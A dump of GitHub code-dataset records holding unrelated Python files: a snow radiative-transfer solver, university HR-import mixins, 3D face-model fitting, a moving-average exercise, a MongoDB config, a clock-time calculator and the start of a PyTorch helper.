dividing A/B and E/B \n # throws an exception due to division by zero. 
Here we use numpy's nan_to_num\n # function to achieve the division where possible and replace nans with zeros.\n # We also set numpy to ignore the division error.\n\n # for bottom layer only\n # Toon et al Eq 45\n AS = np.zeros([2*nbr_lyr,nbr_wvl])\n DS = np.zeros([2*nbr_lyr,nbr_wvl])\n\n np.seterr(divide='ignore',invalid='ignore')\n AS[2*nbr_lyr-1,:] = np.nan_to_num(A[2*nbr_lyr-1,:]/B[2*nbr_lyr-1,:])\n DS[2*nbr_lyr-1,:] = np.nan_to_num(E[2*nbr_lyr-1,:]/B[2*nbr_lyr-1,:])\n\n # for all layers above bottom layer, starting at second-to-bottom and progressing towards\n # surface:\n # Toon et al Eq 46\n X = np.zeros([nbr_lyr*2,nbr_wvl])\n for i in np.arange(2*nbr_lyr-2,-1, -1):\n X[i,:] = 1/(B[i,:]-(D[i,:] * AS[i+1,:]))\n AS[i,:] = np.nan_to_num(A[i,:]*X[i,:])\n DS[i,:] = np.nan_to_num((E[i,:]-(D[i,:]*DS[i+1,:]))*X[i,:])\n\n # then for all layers, progressing from surface to bottom\n # Toon et al Eq 47\n Y = np.zeros([nbr_lyr*2,nbr_wvl])\n\n for i in np.arange(0,2*nbr_lyr,1):\n if i ==0:\n Y[0,:] = DS[0,:]\n else:\n Y[i,:] = DS[i,:] - (AS[i,:]*Y[i-1,:])\n\n \n #############################################################\n # CALCULATE DIRECT BEAM FLUX AT BOTTOM OF EACH LAYER\n\n # loop through layers\n for i in np.arange(0,nbr_lyr,1):\n\n # (Toon et al. eq 50)\n direct[i,:] = mu_not * np.pi * Fs * np.exp(-(tau_clm[i,:] + tau_star[i,:]) / mu_not)\n\n # net flux (positive upward = F_up - F_down) at the base of each layer (Toon et al. Eq 48)\n F_net[i,:] = (Y[2*i,:] * (e1[i,:]-e3[i,:])) + (Y[2*i+1,:] * (e2[i,:] - e4[i,:])) + C_pls_btm[i,:] - C_mns_btm[i,:] - direct[i,:]\n\n # mean intensity at the base of each layer (Toon et al. Eq 49)\n intensity[i,:] = (1/mu_one) * (Y[2*i,:] * (e1[i,:] + e3[i,:]) + Y[2*i+1,:] * (e2[i,:] + e4[i,:]) + C_pls_btm[i,:] + C_mns_btm[i,:]) + (direct[i,:]/mu_not)\n intensity[i, :] = intensity[i, :] / (4 * np.pi)\n\n\n # Upward flux at upper model boundary (Toon et al Eq 31)\n F_top_pls = (Y[0,:] * (np.exp(-lam[0,:] * tau_star[0,:]) + GAMMA[0,:])) + (Y[1,:] * (np.exp(-lam[0,:] * tau_star[0,:])-GAMMA[0,:])) + C_pls_top[0,:]\n\n\n for i in np.arange(0,nbr_lyr,1):\n # Upward flux at the bottom of each layer interface (Toon et al. Eq31)\n F_up[i,:] = Y[2*i,:] * (np.exp(0) + GAMMA[i,:] * np.exp(-lam[i,:] * tau_star[i,:])) + Y[2*i+1,:] * (np.exp(0) - GAMMA[i,:] * np.exp(-lam[i,:] * tau_star[i,:])) + C_pls_btm[i,:]\n\n # Downward flux at the bottom of each layer interface (Toon et al. 
Eq32) plus direct beam component\n F_down[i,:] = Y[2*i,:] * (GAMMA[i,:] * np.exp(0) + np.exp(-lam[i,:] * tau_star[i,:])) + Y[2*i+1,:] * (GAMMA[i,:] * np.exp(0) - np.exp(-lam[i,:] * tau_star[i,:])) + C_mns_btm[i,:] + direct[i,:]\n\n # Derived net (upward-downward) flux (should equal F_net)\n F_net2[i,:] = F_up[i,:] - F_down[i,:]\n\n intensity2[i,:] = F_up[i,:] + F_down[i,:]\n \n # surface planar intensity\n intensity2_top[:] = F_top_pls + ((mu_not * np.pi * Fs) + Fd)\n\n # Net flux at lower model boundary = bulk transmission through entire media\n # = energy absorbed by underlying surface\n F_btm_net[0,:] = -F_net[nbr_lyr-1,:]\n\n # Hemispheric wavelength-dependent albedo\n albedo = F_top_pls/ ((mu_not * np.pi * Fs)+ Fd)\n\n # Net flux at upper model boundary\n F_top_net[0,:] = F_top_pls - ((mu_not * np.pi * Fs) + Fd)\n\n # absorbed flux in each layer (negative if there is net emission (bnd_typ = 4))\n for i in np.arange(0,nbr_lyr,1):\n if i ==0:\n F_abs[0,:] = F_net[0,:]-F_top_net\n else:\n F_abs[i,:] = F_net[i,:] - F_net[i-1,:]\n\n # set indices for constraining calculations to VIS and NIR bands\n vis_max_idx = 39\n nir_max_idx = len(wvl)\n\n # Spectrally-integrated absorption in each layer:\n abs_slr = np.sum(F_abs,axis=1)\n\n for i in np.arange(0,nbr_lyr,1):\n abs_vis[i] = np.sum(F_abs[i,0:vis_max_idx])\n abs_nir[i] = np.sum(F_abs[i,vis_max_idx:nir_max_idx])\n\n # Spectrally - integrated absorption by underlying surface:\n abs_slr_btm = sum(np.squeeze(F_btm_net))\n abs_vis_btm = sum(np.squeeze(F_btm_net[0:vis_max_idx]))\n abs_nir_btm = sum(np.squeeze(F_btm_net[0,vis_max_idx:nir_max_idx]))\n\n # Calculate radiative heating rate in kelvin per second.\n # Multiply by 3600 to convert to K per hour\n # specfic heta capacity of ice = 2117 J kg-1 K-1\n heat_rt = abs_slr / (L_snw * 2117) # [K / s]\n heat_rt = heat_rt * 3600 # [K / hr]\n\n # Energy conservation check:\n # % Incident direct + diffuse radiation equals(absorbed + transmitted + bulk_reflected)\n energy_sum = (mu_not * np.pi * Fs) + Fd - (sum(F_abs) + F_btm_net + F_top_pls)\n\n # spectrally-integrated terms:\n # energy conservation total error\n energy_error = abs(np.sum(energy_sum))\n\n if energy_error > 1e-10:\n energy_conservation_error = np.sum(abs(energy_sum))\n print(f\"CONSERVATION OF ENERGY ERROR OF {energy_conservation_error}\")\n\n ######################################\n # Re-alias results for outputting\n ######################################\n\n # total incident insolation(Wm - 2)\n total_insolation = np.sum((mu_not * np.pi * Fs) + Fd)\n\n # energy absorbed by all snow layers\n abs_slr_tot = np.sum(np.sum(F_abs))\n\n # energy absorbed by underlying substrate\n energy_abs_under_sfc = np.sum(F_btm_net)\n\n # Spectrally - integrated solar, visible, and NIR albedos:\n BBA = np.sum(flx_slr * albedo) / np.sum(flx_slr)\n\n BBAVIS = sum(flx_slr[0:vis_max_idx]*albedo[0:vis_max_idx])/ sum(flx_slr[0:vis_max_idx])\n\n BBANIR = sum(flx_slr[vis_max_idx:nir_max_idx]*albedo[vis_max_idx: nir_max_idx]) / sum(flx_slr[vis_max_idx:nir_max_idx])\n\n # % Spectrally - integrated VIS and NIR total snowpack absorption:\n abs_vis_tot = sum(flx_slr[0:vis_max_idx]*(1 - albedo[0:vis_max_idx]))\n abs_nir_tot = sum(flx_slr[vis_max_idx:nir_max_idx]*(1 - albedo[vis_max_idx:nir_max_idx]))\n\n return wvl, albedo, BBA, BBAVIS, BBANIR, abs_slr, abs_slr_tot, abs_vis_tot, heat_rt, 
total_insolation\n","repo_name":"jmcook1186/bioDISORTpy","sub_path":"snicar8d_GO.py","file_name":"snicar8d_GO.py","file_ext":"py","file_size_in_byte":24193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"43244904795","text":"import logging\nfrom Cerebrum.modules.hr_import.employee_import import EmployeeImportBase\n\nfrom leader_groups import ManagerGroupSync\nfrom reservation_group import ReservationGroupUpdater\nfrom account_type import AccountTypeUpdater\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_affiliations(db_object, account_types):\n return set(\n (r['affiliation'], r['status'], r['ou_id'])\n for r in db_object.list_affiliations(\n person_id=db_object.entity_id,\n affiliation=account_types.restrict_affiliation,\n source_system=account_types.restrict_source))\n\n\nclass AccountTypeMixin(EmployeeImportBase):\n \"\"\"\n Import mixin that tries to update account types on affiliation change.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(AccountTypeMixin, self).__init__(*args, **kwargs)\n # Account type updater\n self._account_update = AccountTypeUpdater(\n self.db,\n restrict_affiliation=self.const.affiliation_ansatt,\n restrict_source=self.source_system)\n\n def update(self, hr_object, db_object):\n # Track aff changes in parent.update()\n affs_before = _get_affiliations(db_object, self._account_update)\n super(AccountTypeMixin, self).update(hr_object, db_object)\n affs_after = _get_affiliations(db_object, self._account_update)\n\n # Try to update account types on change\n if affs_before != affs_after:\n added_affs = affs_after - affs_before\n removed_affs = affs_before - affs_after\n logger.debug('AccountTypeMixin aff changes: added=%s, removed=%s',\n repr(added_affs), repr(removed_affs))\n self._account_update.sync(db_object, added=added_affs,\n removed=removed_affs)\n\n def remove(self, hr_object, db_object):\n # Track aff changes in parent.remove()\n affs_before = _get_affiliations(db_object, self._account_update)\n super(AccountTypeMixin, self).remove(hr_object, db_object)\n affs_after = _get_affiliations(db_object, self._account_update)\n\n # Try to update account types on change\n if affs_before != affs_after:\n added_affs = affs_after - affs_before\n removed_affs = affs_before - affs_after\n logger.debug('AccountTypeMixin aff changes: added=%s, removed=%s',\n repr(added_affs), repr(removed_affs))\n self._account_update.sync(db_object, added=added_affs,\n removed=removed_affs)\n\n\nclass ManagerGroupMixin(EmployeeImportBase):\n \"\"\"\n Import mixin that tries to update manager groups according to a\n `hr_object.leader_ous` attribute.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ManagerGroupMixin, self).__init__(*args, **kwargs)\n # Manager group sync\n self._mgr_groups = ManagerGroupSync(self.db)\n\n def update(self, hr_object, db_object):\n super(ManagerGroupMixin, self).update(hr_object, db_object)\n\n # Manager org unit itentifiers\n manager_ou_ids = tuple(hr_object.leader_ous)\n logger.debug('ManagerGroupMixin: manager at ou=%s',\n repr(manager_ou_ids))\n\n # Find org units and update\n ou_objects = tuple(self._get_ou(ou_id_pairs)\n for ou_id_pairs in manager_ou_ids)\n self._mgr_groups.sync(db_object.entity_id, ou_objects)\n\n def remove(self, hr_object, db_object):\n super(ManagerGroupMixin, self).remove(hr_object, db_object)\n # Remove all org-manager group memberships\n logger.debug('ManagerGroupMixin: removing manager positions')\n self._mgr_groups.sync(db_object.entity_id, 
set())\n\n\nclass ReservationGroupMixin(EmployeeImportBase):\n \"\"\"\n Import mixin that tries to update reservation groups according to a\n `hr_object.reserved` attribute.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super(ReservationGroupMixin, self).__init__(*args, **kwargs)\n # Reservation group sync\n self._reservation_group = ReservationGroupUpdater(self.db)\n\n def update(self, hr_object, db_object):\n super(ReservationGroupMixin, self).update(hr_object, db_object)\n # Update reservation group if flag is set\n is_reserved = hr_object.reserved\n logger.debug('ReservationGroupMixin: is-reserved=%s',\n repr(is_reserved))\n self._reservation_group.set(db_object.entity_id, is_reserved)\n\n def remove(self, hr_object, db_object):\n super(ReservationGroupMixin, self).remove(hr_object, db_object)\n # Remove public catalog reservation\n logger.debug('ReservationGroupMixin: removing reservations')\n self._reservation_group.set(db_object.entity_id, False)\n\n\nclass UioEmployeeImportMixin(AccountTypeMixin, ManagerGroupMixin,\n ReservationGroupMixin, EmployeeImportBase):\n pass\n","repo_name":"unioslo/cerebrum","sub_path":"Cerebrum/modules/no/uio/hr_import/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":4960,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"25239497326","text":"import numpy as np\r\nimport scipy.io as sio\r\nimport utility\r\nimport fitting\r\nimport cv2\r\nimport matplotlib as plt\r\nimport sys\r\nimport time \r\n\r\nclass morphable_model(object): \r\n \r\n def __init__(self, path):\r\n '''\r\n Parameters\r\n ----------\r\n shapeMU, expMU: (3*nver, 1)\r\n shapePC: (3*nver, nshape), nshape=199\r\n expPC: (3*nver, nexp), nexp=29\r\n texPC: (3*nver, ntex), ntex=199\r\n tri: (ntri, 3)\r\n kpt_idx: (1, 68)\r\n \r\n '''\r\n super(morphable_model, self).__init__()\r\n self.model = sio.loadmat(path)\r\n self.model = self.model['model']\r\n self.model = self.model[0,0]\r\n \r\n self.shapeMU = self.model['shapeMU']\r\n self.shapePC = self.model['shapePC']\r\n self.shapeEV = self.model['shapeEV']\r\n self.expMU = self.model['expMU']\r\n self.expPC = self.model['expPC']\r\n self.expEV = self.model['expEV']\r\n self.fullMU = self.shapeMU + self.expMU\r\n \r\n self.texMU = self.model['texMU']\r\n self.texPC = self.model['texPC']\r\n self.texEV = self.model['texEV']\r\n \r\n self.tri = self.model['tri'].T - 1\r\n self.mouth_tri = self.model['tri_mouth'].T - 1\r\n self.full_tri = np.vstack((self.tri, self.mouth_tri))\r\n self.kpt_idx = self.model['kpt_idx'].astype(np.int32)-1\r\n \r\n self.nver = int(self.shapeMU.shape[0]/3)\r\n self.ntri = self.tri.shape[0]\r\n self.nshape = self.shapePC.shape[1]\r\n self.nexp = self.expPC.shape[1]\r\n self.ntex = self.texPC.shape[1]\r\n \r\n self.laplacian_matrix = np.eye(self.nver, dtype=np.float32)\r\n for i in range(self.nver):\r\n self.laplacian_matrix[i][i] = -1\r\n for face in self.tri:\r\n self.laplacian_matrix[face[0]][face[1]] = 1\r\n self.laplacian_matrix[face[0]][face[2]] = 1\r\n self.laplacian_matrix[face[1]][face[0]] = 1\r\n self.laplacian_matrix[face[1]][face[2]] = 1\r\n self.laplacian_matrix[face[2]][face[0]] = 1\r\n self.laplacian_matrix[face[2]][face[1]] = 1\r\n for i in range(self.nver):\r\n summation = np.sum(self.laplacian_matrix[i]) + 1\r\n idx = np.where(self.laplacian_matrix[i]==1)\r\n self.laplacian_matrix[i][idx] /= summation \r\n \r\n def generate_para(self, type, flag):\r\n if type == \"shape\":\r\n if flag:\r\n para = 
np.random.uniform(1e04, 4e05, (self.nshape, 1))\r\n else:\r\n para = np.zeros((self.nshape, 1))\r\n return para\r\n \r\n elif type == \"tex\":\r\n if flag:\r\n para = np.random.uniform(size = (self.ntex, 1))\r\n else:\r\n para = np.zeros((self.ntex, 1))\r\n return para\r\n \r\n elif type == \"exp\":\r\n if flag:\r\n para = np. random.uniform(size = (self.nexp, 1))\r\n else:\r\n para = np.zeros((self.nexp, 1))\r\n return para\r\n \r\n else: \r\n print(\"input type error\")\r\n sys.exit()\r\n \r\n \r\n def generate_vertices(self, shape_para, exp_para=0):\r\n vertices = self.fullMU + self.shapePC @ shape_para + self.expPC @ exp_para\r\n vertices = np.reshape(vertices, (self.nver, 3))\r\n return vertices\r\n \r\n def generate_tex(self, tex_para):\r\n tex = self.texMU + self.texPC @ tex_para\r\n tex = np.reshape(tex, (self.nver, 3))\r\n return tex\r\n \r\n def transform(self, vertices, f, R, t):\r\n trans_vertices = f * vertices @ R.T + t[np.newaxis,:]\r\n return trans_vertices\r\n \r\n \r\n def fit(self, kpt, tol=1e-4, iteration=10):\r\n '''\r\n Parameters:\r\n tol: error tolerance\r\n kpt: [68, 2], 2d position of input images\r\n kpt_vertices: [68, 3], 3d position of fixed landmarks\r\n fitting ||Xproject - kpt||^2 + l2 norm,\r\n where Xproject = f*P*R*kpt_vertices + t[:2]\r\n '''\r\n \r\n #-- init\r\n shape_para = np.zeros((self.nshape, 1), dtype = np.float32)\r\n exp_para = np.zeros((self.nexp, 1), dtype = np.float32)\r\n \r\n #-------------------- estimate\r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[2, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n fullMU = self.fullMU[valid_idx, :]\r\n shapePC = self.shapePC[valid_idx, :]\r\n expPC = self.expPC[valid_idx, :]\r\n \r\n \r\n for i in range(iteration):\r\n start = time.time()\r\n kpt_vertices = fullMU + shapePC @ shape_para + expPC @ exp_para\r\n kpt_vertices = np.reshape(kpt_vertices, (int(len(kpt_vertices)/3), 3))\r\n\r\n P = fitting.get_affine_matrix(kpt_vertices, kpt)\r\n f, R, t = fitting.P2Rft(P)\r\n\r\n shape = shapePC @ shape_para\r\n shape = np.reshape(shape, [int(len(shape)/3), 3]).T\r\n intact_shape = self.shapePC @ shape_para\r\n intact_shape = np.reshape(intact_shape, [int(len(intact_shape)/3), 3]).T\r\n exp_para = fitting.optim_regression(kpt.T, fullMU, expPC, self.expEV, shape, f, R, t[:2], intact_shape, self.expPC, self.laplacian_matrix, self.fullMU, lamb=100, type='exp')\r\n \r\n expression = expPC @ exp_para\r\n expression = np.reshape(expression, [int(len(expression)/3), 3]).T\r\n intact_exp = self.expPC @ exp_para\r\n intact_exp = np.reshape(intact_exp, [int(len(intact_exp)/3), 3]).T\r\n shape_para = fitting.optim_regression(kpt.T, fullMU, shapePC, self.shapeEV, expression, f, R, t[:2], intact_exp, self.shapePC, self.laplacian_matrix, self.fullMU, lamb=1, type='shape')\r\n \r\n err = fitting.err(kpt_vertices, kpt, shape_para, exp_para, f, R, t)\r\n print(\"shape err: %f\"%err)\r\n if err < tol:\r\n break\r\n end = time.time()\r\n print('{} time cost:{}'.format(i, end-start))\r\n \r\n return shape_para, exp_para, f, R, t\r\n\r\n def frame_smooth_fit(self, pre_shape_para, pre_exp_para, kpt, iteration=100):\r\n '''\r\n it's a fitting process adding frame smooth regularization, we don't need eigenvalue as prior condition\r\n '''\r\n shape_para = pre_shape_para\r\n exp_para = pre_exp_para\r\n \r\n #-------------------- estimate\r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[2, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n fullMU = self.fullMU[valid_idx, 
:]\r\n shapePC = self.shapePC[valid_idx, :]\r\n expPC = self.expPC[valid_idx, :]\r\n \r\n for i in range(iteration):\r\n kpt_vertices = fullMU + shapePC @ shape_para + expPC @ exp_para\r\n kpt_vertices = np.reshape(kpt_vertices, (int(len(kpt_vertices)/3), 3))\r\n\r\n P = fitting.get_affine_matrix(kpt_vertices, kpt)\r\n f, R, t = fitting.P2Rft(P)\r\n\r\n shape = shapePC @ shape_para\r\n shape = np.reshape(shape, [int(len(shape)/3), 3]).T\r\n exp_para = fitting.smooth_optim(kpt.T, fullMU, expPC, pre_exp_para, shape, f, R, t[:2], lamb=1e-6, type='exp')\r\n\r\n expression = expPC @ exp_para\r\n expression = np.reshape(expression, [int(len(expression)/3), 3]).T\r\n shape_para = fitting.smooth_optim(kpt.T, fullMU, shapePC, pre_shape_para, expression, f, R, t[:2], lamb=1e-6, type='shape')\r\n \r\n err = fitting.err(kpt_vertices, kpt, shape_para, exp_para, f, R, t)\r\n print(\"shape err: %f\"%err)\r\n \r\n return shape_para, exp_para, f, R, t\r\n \r\n def exp_fit(self, shape_para, kpt, tol=1e-4, iteration=10):\r\n '''\r\n Parameters:\r\n tol: error tolerance\r\n kpt: [68, 2], 2d position of input images\r\n kpt_vertices: [68, 3], 3d position of fixed landmarks\r\n fitting ||Xproject - kpt||^2 + l2 norm,\r\n where Xproject = f*P*R*kpt_vertices + t[:2]\r\n '''\r\n \r\n #-- init\r\n exp_para = np.zeros((self.nexp, 1), dtype = np.float32)\r\n \r\n #-------------------- estimate\r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[2, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n fullMU = self.fullMU[valid_idx, :]\r\n shapePC = self.shapePC[valid_idx, :]\r\n expPC = self.expPC[valid_idx, :]\r\n \r\n for i in range(iteration):\r\n kpt_vertices = fullMU + shapePC @ shape_para + expPC @ exp_para\r\n kpt_vertices = np.reshape(kpt_vertices, (int(len(kpt_vertices)/3), 3))\r\n\r\n P = fitting.get_affine_matrix(kpt_vertices, kpt)\r\n f, R, t = fitting.P2Rft(P)\r\n\r\n shape = shapePC @ shape_para\r\n shape = np.reshape(shape, [int(len(shape)/3), 3]).T\r\n exp_para = fitting.optim_regression(kpt.T, fullMU, expPC, self.expEV, shape, f, R, t[:2], lamb=50, type='exp')\r\n \r\n err = fitting.err(kpt_vertices, kpt, shape_para, exp_para, f, R, t)\r\n print(\"shape err: %f\"%err)\r\n if err < tol:\r\n break\r\n \r\n return exp_para, f, R, t \r\n \r\n def tex_fit(self, kpt, lamb=0, tol=1e-4, iteration=10):\r\n '''\r\n Parameters\r\n ----------\r\n kpt: [68, 3], rgb of keypoints of input images\r\n fitting ||kpt_tex - kpt||^2 + l2norm,\r\n where kpt_tex = texMU + texPC * tex_para\r\n \r\n Returns\r\n -------\r\n tex_para: [ntex, 1]\r\n '''\r\n # init\r\n tex_para = np.zeros((self.ntex, 1), dtype=np.float32)\r\n \r\n kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n kpt3d[1, :] += 1\r\n kpt3d[1, :] += 2\r\n valid_idx = kpt3d.flatten('F')\r\n \r\n texMU = self.texMU[valid_idx, :]\r\n texPC = self.texPC[valid_idx, :]\r\n \r\n kpt_copy = kpt.copy()\r\n kpt_copy = np.reshape(kpt_copy, (kpt_copy.shape[0]*kpt_copy.shape[1], 1)) \r\n # linear regression \r\n expression_left = texPC.T @ texPC + lamb*np.diagflat(1/self.texEV**2)\r\n expression_right = texPC.T @ (texMU - kpt_copy)\r\n tex_para = np.linalg.solve(expression_left, expression_right)\r\n \r\n # # gradient descent\r\n # for i in range(iteration):\r\n # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # tex_para = tex_para - lamb*grad\r\n # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n \r\n \r\n # # nesterov momentum\r\n # Vdw = 0; beta = 0.5\r\n # for i in 
range(iteration):\r\n # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # Vdw = beta*Vdw + (1-beta)*grad\r\n # tex_para = tex_para - lamb*Vdw\r\n # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n return tex_para\r\n \r\n def tex_fine_fit(self, tex_para, valid_index, kpt, lamb=0, tol=1e-4, iteration=10):\r\n '''\r\n Parameters\r\n ----------\r\n tex_para: roughly fitted tex parameters[ntex, 1]\r\n kpt: full images rgb\r\n \r\n Returns\r\n -------\r\n '''\r\n kpt_copy = kpt.copy()\r\n kpt_copy = np.reshape(kpt_copy, (-1, 1))\r\n \r\n # # GD\r\n # for i in range(iteration):\r\n # grad = self.texPC.T @ (self.texMU - kpt_copy + self.texPC@tex_para)\r\n # tex_para = tex_para - lamb*grad/grad.shape[0]\r\n # err = np.sum((kpt_copy - self.texMU - self.texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n \r\n # nesterov momentum\r\n Vdw = 0; beta = 0.9; eta=1e5\r\n texMU_masked = self.texMU[valid_index, :]\r\n texPC_masked = self.texPC[valid_index, :]\r\n for i in range(iteration):\r\n grad = texPC_masked.T @ (texMU_masked - kpt_copy + texPC_masked@tex_para) + eta*np.diagflat(1/self.texEV**2)@tex_para\r\n Vdw = beta*Vdw + (1-beta)*grad\r\n tex_para = tex_para - lamb*Vdw/Vdw.shape[0]\r\n err = np.sum((kpt_copy - texMU_masked - texPC_masked@tex_para)**2) / np.sum(kpt_copy**2)\r\n if err < tol:\r\n break\r\n print(err)\r\n \r\n return tex_para\r\n \r\n # def tex_last_fit(self, tex_para, kpt, lamb=0, tol=1e-4, iteration=10):\r\n # '''\r\n # Parameters\r\n # ----------\r\n # tex_para: roughly fitted tex parameters[ntex, 1]\r\n # kpt: full images rgb\r\n \r\n # Returns\r\n # -------\r\n # ''' \r\n # kpt3d = np.tile(self.kpt_idx, [3, 1])*3\r\n # kpt3d[1, :] += 1\r\n # kpt3d[1, :] += 2\r\n # valid_idx = kpt3d.flatten('F')\r\n \r\n # texMU = self.texMU[valid_idx, :]\r\n # texPC = self.texPC[valid_idx, :]\r\n \r\n # kpt_copy = kpt.copy()\r\n # kpt_copy = np.reshape(kpt_copy, (kpt_copy.shape[0]*kpt_copy.shape[1], 1)) \r\n \r\n # # gradient descent\r\n # for i in range(iteration):\r\n # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # tex_para = tex_para - lamb*grad\r\n # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # if err < tol:\r\n # break\r\n # print(err)\r\n \r\n # # # nesterov momentum\r\n # # Vdw = 0; beta = 0.5\r\n # # for i in range(iteration):\r\n # # grad = texPC.T @ (texMU - kpt_copy + texPC@tex_para)\r\n # # Vdw = beta*Vdw + (1-beta)*grad\r\n # # tex_para = tex_para - lamb*Vdw\r\n # # err = np.sum((kpt_copy - texMU - texPC@tex_para)**2) / np.sum(kpt_copy**2)\r\n # # if err < tol:\r\n # # break\r\n # # print(err)\r\n # return tex_para\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zb-gong/3DMM_related","sub_path":"MMfitting/MModel.py","file_name":"MModel.py","file_ext":"py","file_size_in_byte":14255,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"39752698244","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 28 12:33:00 2020\r\n\r\n@author: gunda\r\n\"\"\"\r\n\r\nclass MovingAverage:\r\n\r\n def __init__(self, size):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.size = size\r\n self.queue = []\r\n\r\n def next(self, val):\r\n self.queue.append(val)\r\n # Calculate the sum of the moving window\r\n window_sum = sum(self.queue[-self.size:])\r\n print(window_sum / min(len(self.queue), self.size))\r\n return 
window_sum / min(len(self.queue), self.size)\r\n\r\n# Your MovingAverage object will be instantiated and called as such:\r\n# obj = MovingAverage(size)\r\n# param_1 = obj.next(val)\r\n\r\nobj = MovingAverage(3)\r\nobj.next(1)\r\nobj.next(10)\r\nobj.next(3)\r\nobj.next(5)\r\n","repo_name":"gundamace17/LeetCode","sub_path":"Python/0346. Moving Average from Data Stream.py","file_name":"0346. Moving Average from Data Stream.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28730600910","text":"import os\nimport dotenv\nfrom pymongo import MongoClient\n\n\ndotenv.load_dotenv()\n\ndburl = os.getenv('URL')\n\nprint(dburl)\nif not dburl:\n raise ValueError('no tienes url de mongo')\n\nclient = MongoClient(dburl)\ndb = client.get_database()\ncollection = db['WSB_posts']\n","repo_name":"Javi-Python/API-Project","sub_path":"config/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39330403210","text":"def add_time(start, duration, day=None):\n\n\n week_days = [\"sunday\",\"monday\",\"tuesday\",\"wednesday\",\"thursday\",\"friday\",\"saturday\" ]\n \n\n #new time\n start_time = start.split(\" \")[0]\n new_hour = int(start_time.split(\":\")[0]) + int(duration.split(\":\")[0])\n\n new_minutes = int(start_time.split(\":\")[1]) + int(duration.split(\":\")[1])\n if new_minutes > 59:\n new_hour += 1\n new_minutes = new_minutes - 60\n if new_minutes < 10:\n new_minutes = \"0\" + str(new_minutes)\n \n #days later/AMPM\n days_bool = False\n days_later = 0\n\n if new_hour > 11:\n if \"PM\" in start:\n days_later += int(new_hour / 24) + 1\n days_bool = True\n ampm = int(new_hour - 24*(days_later - 1))\n if ampm > 11:\n clock = \"AM\"\n else:\n clock = \"PM\"\n \n if \"AM\" in start:\n days_later = int(new_hour / 24)\n days_bool = True\n ampm = int(new_hour - 24*days_later)\n if ampm > 11:\n clock = \"PM\"\n else:\n clock = \"AM\" \n else:\n if \"PM\" in start:\n clock = \"PM\"\n if \"AM\" in start:\n clock = \"AM\"\n\n if new_hour > 12:\n if new_hour % 12 != 0:\n new_hour = new_hour % 12\n if new_hour % 12 == 0:\n new_hour = 12\n \n new_time = str(new_hour) + \":\" + str(new_minutes)\n\n #days message\n days_message = \"\"\n counting_days = False\n if days_later >= 1:\n counting_days = True\n if counting_days is True:\n if days_later > 1 and days_later != 0:\n days_message = \"(\" + str(days_later) + \" days later\" + \")\"\n elif days_later == 1:\n days_message = \"(next day)\"\n\n\n if day != None:\n which_day = week_days.index(day.lower())\n show_day = week_days[(which_day + days_later) % 7]\n\n output = (new_time + \" \" + clock + (\", \" + show_day.capitalize() if not day is None else \"\") + (\" \" + days_message if days_bool else \"\")).rstrip()\n \n return output","repo_name":"bastosanaa/Scientific-Computing-w-Python-FCC","sub_path":"time_calculator.py","file_name":"time_calculator.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73218961531","text":"from functools import partial\nfrom netrc import netrc\nimport torch\nimport torch.nn as nn\nfrom thop import profile\nimport torch.nn.functional as F\nfrom torch.nn import Sequential, Linear, ReLU, GRU\n\ndef drop_path(x, drop_prob: float = 0., training: bool = False): \n if drop_prob == 0. 
